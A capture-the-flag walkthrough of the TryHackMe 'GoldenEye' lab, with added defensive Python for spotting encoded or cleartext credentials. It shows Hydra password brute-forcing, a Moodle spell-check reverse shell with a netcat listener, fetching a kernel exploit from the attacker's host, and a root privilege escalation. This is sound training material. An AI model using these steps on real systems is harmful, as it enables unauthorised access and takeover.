
【TryHackMe】GoldenEye:Walkthrough

Overview

This is a walkthrough of the TryHackMe room "GoldenEye".

Task1

Q2.Use nmap to scan the network for all ports. How many ports are open?

Hint.nmap -p- -Pn

Run a port scan.

$ nmap -Pn -T4 -sV -A -sC -p- 10.10.79.54 -oN nmap_result
PORT      STATE    SERVICE  VERSION
25/tcp    open     smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp    open     http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open     ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE SASL(PLAIN) USER UIDL TOP PIPELINING CAPA
55007/tcp open     pop3     Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS PIPELINING USER UIDL SASL(PLAIN) TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time

This shows which ports are open.

| Port  | Service  | Version            |
|-------|----------|--------------------|
| 25    | smtp     | Postfix smtpd      |
| 80    | http     | Apache httpd 2.4.7 |
| 55006 | ssl/pop3 | Dovecot pop3d      |
| 55007 | pop3     | Dovecot pop3d      |

A.4

Q4.Who needs to make sure they update their default password?

Access port 80.

index.jpg

In the page source I found terminal.js.

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//
(omitted)

This gives the boris account and an encoded password.

A.boris

Q5.Whats their password?

Decoding the string gives the password.

pas.jpg
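The password above is hidden as HTML numeric character references, which keeps it out of a plain `grep` for the word "password". As an added example (not code from the original walkthrough or the room), the Python below decodes such references and flags long runs of them in source files, the check a code review or secret scan would apply to a file like terminal.js; the function names and the sample snippet are my own.

```python
import re

# Constructed copy of the encoded comment found in terminal.js on this page.
ENCODED = ("&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
           "&#72;&#97;&#99;&#107;&#51;&#114;")

# One numeric character reference: decimal (&#73;) or hexadecimal (&#x49;).
_NCR = re.compile(r"&#([xX][0-9a-fA-F]+|[0-9]+);")


def decode_numeric_refs(text: str) -> str:
    """Replace every HTML numeric character reference with the character it names."""
    def repl(match):
        ref = match.group(1)
        code = int(ref[1:], 16) if ref[0] in "xX" else int(ref)
        return chr(code)
    return _NCR.sub(repl, text)


def find_encoded_strings(source: str, min_refs: int = 8):
    """Return (raw, decoded) pairs for every run of at least min_refs consecutive
    numeric references in a source file: entity-encoding a secret defeats a
    keyword grep, so a secret scan should decode such runs before matching."""
    run = re.compile(r"(?:&#(?:[xX][0-9a-fA-F]+|[0-9]+);){%d,}" % min_refs)
    return [(m.group(0), decode_numeric_refs(m.group(0))) for m in run.finditer(source)]


if __name__ == "__main__":
    # Constructed snippet in the style of the comment block in terminal.js.
    snippet = "//I encoded you p@ssword below...\n//" + ENCODED + "\n//BTW &#72;&#105;\n"
    for raw, decoded in find_encoded_strings(snippet):
        print(raw, "->", decoded)
```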

Log in to /sev-home/ with the credentials obtained.

login.jpg

The page source shows the names Natalya and Boris.

natalua.jpg

A.InvincibleHack3r

Task2

Q2.If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?

Hint.pop3

I tried logging in to pop3 with the credentials obtained, but it failed.

$ nc -nv 10.10.79.54 55007                               
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.

Brute-force the boris account's password with a wordlist.

$ hydra -f -l boris -P /usr/share/wordlists/fasttrack.txt 10.10.79.54 pop3 -s 55007
[55007][pop3] host: 10.10.79.54   login: boris   password: secret1!

A.secret1!

Q3.Inspect port 55007, what services is configured to use this port?

A.telnet

Q5.What can you find on this service?

A.emails

Q6.What user can break Boris' codes?

Now that the password is known, log in to POP3.

$ nc -nv 10.10.79.54 55007                                                     
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.

Check the three stored emails.

list
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

From the content of mail 2, the answer is natalya.

A.natalya

Q7.Using the users you found on this service, find other users passwords

From the emails, the accounts natalya, root, alec and Xenia could be identified.

Search for each of their passwords by brute force.

$ hydra -f -l natalya -P /usr/share/wordlists/fasttrack.txt 10.10.79.54 pop3 -s 55007
[55007][pop3] host: 10.10.79.54   login: natalya   password: bird

natalya's password is found.

Q8.Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

Hint.You will eventually get a xenia's password in plaintext.

Log in to POP3 and check the emails.

$ nc -nv 10.10.79.54 55007
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

From the email: Username: xenia, Password: RCP90rulez!.

Task3

Q3.Try using the credentials you found earlier. Which user can you login as?

natalya's email revealed the severnaya-station.com domain, so add it to /etc/hosts.

10.10.157.156   severnaya-station.com

Access severnaya-station.com/gnocertdir.

domain access.jpg

Login succeeded with the known xenia account.

xenia login.jpg

A.xenia

Q4.Have a poke around the site. What other user can you find?

A message had arrived from the Dr Doak account, revealing another user.

doak.jpg

A.doak

Q5.What was this users password?

Hint.pop3 + hydra

The doak account may exist on POP3 as well. Identify its password by brute force.

$ hydra -f -l doak -P /usr/share/wordlists/fasttrack.txt 10.10.157.156 pop3 -s 55007
[55007][pop3] host: 10.10.157.156   login: doak   password: goat

A.goat

Q7.What is the next user you can find from doak?

Hint.Emails, emails, emails..

Now that the password is known, log in to POP3.

$ nc -nv 10.10.157.156 55007
(UNKNOWN) [10.10.157.156] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.

The email content gives credentials.

list
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

A.dr_doak

Q8.What is this users password?

A.4England!
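Both natalya's mailbox (the xenia credentials) and doak's mailbox (the dr_doak credentials) hand out logins as plain "username:/password:" lines, and the admin mail to boris even states that mail is not scanned for security risks. As an added example (not code from the original walkthrough or the room), the Python below parses a POP3 RETR transcript, including byte-stuffed lines, and reports messages carrying both fields in the clear, which is the check a mailbox audit would alert on; the transcript is a constructed excerpt modelled on natalya's mail, and the function names are my own.

```python
import re

# Constructed POP3 session excerpt modelled on natalya's mailbox on this page.
TRANSCRIPT = """\
+OK Logged in.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
From: root@ubuntu

Ok, user creds are:

username: xenia
password: RCP90rulez!
..a body line that begins with a dot is sent byte-stuffed
.
"""

# A "key: value" line naming a login or password, anywhere in a message body.
CRED = re.compile(r"^\s*(username|password)\s*:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_retr_messages(transcript: str):
    """Split a POP3 transcript into (headers, body) pairs, one per RETR response.
    A response runs from '+OK n octets' to a line holding a lone '.'; lines that
    arrive as '..' are byte-stuffed and lose their first dot (RFC 1939)."""
    messages, lines, i = [], transcript.splitlines(), 0
    while i < len(lines):
        if re.match(r"\+OK \d+ octets$", lines[i]):
            raw = []
            i += 1
            while i < len(lines) and lines[i] != ".":
                raw.append(lines[i][1:] if lines[i].startswith("..") else lines[i])
                i += 1
            headers, _, body = "\n".join(raw).partition("\n\n")
            messages.append((headers, body))
        i += 1
    return messages


def find_cleartext_creds(transcript: str):
    """Report (recipient, username, password) for every message whose body carries
    both fields in the clear, the pattern a mailbox audit should alert on."""
    hits = []
    for headers, body in parse_retr_messages(transcript):
        rcpt = re.search(r"^X-Original-To:\s*(\S+)", headers, re.MULTILINE)
        fields = {k.lower(): v for k, v in CRED.findall(body)}
        if "username" in fields and "password" in fields:
            hits.append((rcpt.group(1) if rcpt else "?", fields["username"], fields["password"]))
    return hits
```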

Q9.Take a look at their files on the moodle (severnaya-station.com)

Log in to severnaya-station.com with the credentials found.

Under Home->My profile->My private files I found the file s3cret.txt.

priv file.jpg

s3cret.txt
007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

With the image path obtained, download http://severnaya-station.com/dir007key/for-007.jpg.

$ wget http://severnaya-station.com/dir007key/for-007.jpg

Looking at the downloaded file's metadata reveals a Base64-encoded string.

$ exiftool for-007.jpg
(omitted)
Image Description               : eFdpbnRlcjE5OTV4IQ==

This gives the original string.

$ echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d             
xWinter1995x!

Login succeeded with Username: admin, Password: xWinter1995x!.

admin login.jpg

Search the site settings for "spell". Change Spell engine to PSpellShell, enter a Python reverse shell command in Path to aspell, and save.

spell check.jpg

Listen with Netcat.

$ nc -lvnp 1234             
listening on [any] 1234 ...

Go to Home->My profile->Blogs->Add a new entry and click the spell check button.

spell check.jpg

A reverse shell was established.

$ nc -lvnp 1234             
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.157.156] 59716
$ whoami
whoami
www-data

Task4

Q2.Whats the kernel version?

Hint.uname -a

Running linpeas shows that the kernel version has a known vulnerability.

$ ./linpeas.sh

(omitted)
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                              
                               ╚═══════════════════╝                                                             
OS: Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) )

A.3.13.0-32-generic

Q5.What is the root flag?

Searching for vulnerabilities in Linux kernel 3.13.0-32-generic turned up the following PoC.

Create ofs.c on Kali and download it onto the target machine.

$ wget http://10.6.55.144/ofs.c

I tried to compile with gcc, but it does not appear to be installed.

$ gcc ofs.c -o ofs
gcc ofs.c -o ofs
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

Compile with cc instead.

$ cc ofs.c -o ofs
cc ofs.c -o ofs
ofs.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
ofs.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
ofs.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
ofs.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
ofs.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.

I ran the program, but it produced an error and privilege escalation failed.

$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library

Edit the ofs.c code to call cc instead of gcc.

lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

Downloading, compiling and running the PoC again, privilege escalation succeeded.

$ ./ofs  
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

The root flag can be obtained from /root/.flag.txt.

/root/.flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

flag.jpg

A.568628e0d993b1973adc718237da6e93
